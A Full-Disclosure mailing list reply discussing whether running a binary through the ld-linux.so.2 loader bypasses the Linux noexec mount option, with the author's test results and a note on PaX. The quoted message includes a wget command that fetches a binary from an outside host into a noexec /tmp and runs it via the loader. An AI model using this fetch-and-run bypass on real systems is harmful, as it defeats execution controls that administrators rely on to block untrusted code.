Re: linux bugs (survival stories)?

[Joachim Schipper <j.schipper () math uu nl>]

> 'hello world' can bypass noexec 
> just remove the executable flags from the program headers
> the compiled binary don't even need to have executable permissions
>
> #include <stdio.h>
> int main(int argc, char *argv[])   
> {       
>   printf("Hello world!\n");
>   return 0;
> }
>
>
> % sudo mount -o remount,noexec /tmp
> % wget http://pornadmin.net/~tongson/linux/helloworld.bin -O /tmp/helloworld.bin
> % /lib/ld-linux.so.2 /tmp/helloworld.bin
> Hello world!

This does not seem to work when ld-linux.so.2 is on a filesystem mounted
noexec, though [1]. Wouldn't this make it akin to calling /bin/bash
hello_world.sh?

PaX can stop you from mmap()ing a file and then executing the code
inside, IIRC, but since this breaks X11 it's uncommon to enable the
option.

                Joachim

[1] ./ld-linux.so.2 fails when called without arguments. Checked on
linux-2.6.11.7-grsec. ld-linux.so.2 was moved to a different disk before
the check was made, with and without chroot and strace. Where strace was
used, it showed that exec() failed.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/